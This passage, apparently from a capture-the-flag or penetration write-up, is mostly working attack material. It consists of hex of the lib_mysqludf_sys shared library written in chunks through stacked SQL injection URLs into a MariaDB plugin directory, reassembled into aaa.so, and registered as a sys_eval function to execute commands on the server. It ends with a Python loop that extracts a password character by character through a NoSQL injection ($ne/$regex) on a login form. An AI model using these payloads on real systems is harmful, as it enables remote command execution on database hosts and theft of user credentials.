f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803' into dumpfile '/usr/lib/mariadb/plugin/1.txt'%23
/api/?id=0';select '000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e' into dumpfile '/usr/lib/mariadb/plugin/2.txt'%23
/api/?id=0';select '332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000' into dumpfile '/usr/lib/mariadb/plugin/3.txt'%23
?id=0';select unhex(concat(load_file('/usr/lib/mariadb/plugin/1.txt'),load_file('/usr/lib/mariadb/plugin/2.txt'),load_file('/usr/lib/mariadb/plugin/3.txt'))) into dumpfile '/usr/lib/mariadb/plugin/aaa.so'%23
1
?id=0';create function sys_eval returns string soname 'aaa.so'%23
for j inrange(9, 50): for k in dic: payload = {'username[$ne]': '1', 'password[$regex]': f'^{out+k}'} try: re = requests.post(url, data=payload) if"\\u767b\\u9646\\u6210\\u529f"in re.text: # 注意反斜杠需要转义 out += k print(out) break except requests.exceptions.RequestException as e: print(f"请求失败: {e}") time.sleep(0.5) # 添加请求间隔